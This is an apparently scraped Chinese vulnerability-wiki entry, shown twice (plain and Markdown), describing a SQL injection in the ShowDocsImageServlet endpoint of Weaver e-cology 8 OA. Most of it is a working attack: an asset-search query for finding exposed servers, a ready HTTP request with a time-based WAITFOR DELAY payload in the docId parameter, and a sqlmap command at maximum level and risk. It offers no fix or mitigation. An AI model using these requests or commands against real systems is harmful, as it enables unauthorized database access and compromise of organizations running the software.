fofamini-wiki

登录白背景

源码

泛微E-cology 8 ShowDocsImageServlet SQL注入漏洞

一、漏洞简介

泛微e-cology是一款由泛微网络科技开发的协同管理平台，支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology存在SQL注入漏洞，攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。

二、影响版本

泛微e-cology 8

三、资产测绘

hunterapp.name="泛微 e-cology OA" and web.body="ecology8"
特征

四、漏洞复现

GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1+WAITFOR+DELAY+%270%3A0%3A5%27 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ecology_JSessionId=abcqkwt_KlBdWd0ikPIXy
Upgrade-Insecure-Requests: 1

sqlmap

GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ecology_JSessionId=abcqkwt_KlBdWd0ikPIXy
Upgrade-Insecure-Requests: 1

sqlmap -r 1.txt -p docId --random-agent  --level 5 --risk 3  --batch

原文: https://www.yuque.com/xiaokp7/ocvun2/cppucs7nfbknmwda

# 泛微E-cology 8 ShowDocsImageServlet SQL注入漏洞

# 一、漏洞简介
泛微e-cology是一款由泛微网络科技开发的协同管理平台，支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology存在SQL注入漏洞，攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。

# 二、影响版本

- 泛微e-cology 8

# 三、资产测绘

- hunter`app.name="泛微 e-cology OA" and web.body="ecology8"`
- 特征

![image.png](./img/tDa8TO3KqRVcXWWC/1694364042059-7f283133-b456-4f2c-a302-42ceec03cba1-595368.png)

# 四、漏洞复现
```
GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1+WAITFOR+DELAY+%270%3A0%3A5%27 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ecology_JSessionId=abcqkwt_KlBdWd0ikPIXy
Upgrade-Insecure-Requests: 1
```
![image.png](./img/tDa8TO3KqRVcXWWC/1702462398817-2f441702-a596-4bd0-9535-f4ee7865d8e1-555718.png)
sqlmap
```
GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ecology_JSessionId=abcqkwt_KlBdWd0ikPIXy
Upgrade-Insecure-Requests: 1
```
```
sqlmap -r 1.txt -p docId --random-agent  --level 5 --risk 3  --batch
```
![image.png](./img/tDa8TO3KqRVcXWWC/1702462437646-76c21a61-d6e0-43f5-b8b6-6d9a069a77df-102000.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cppucs7nfbknmwda>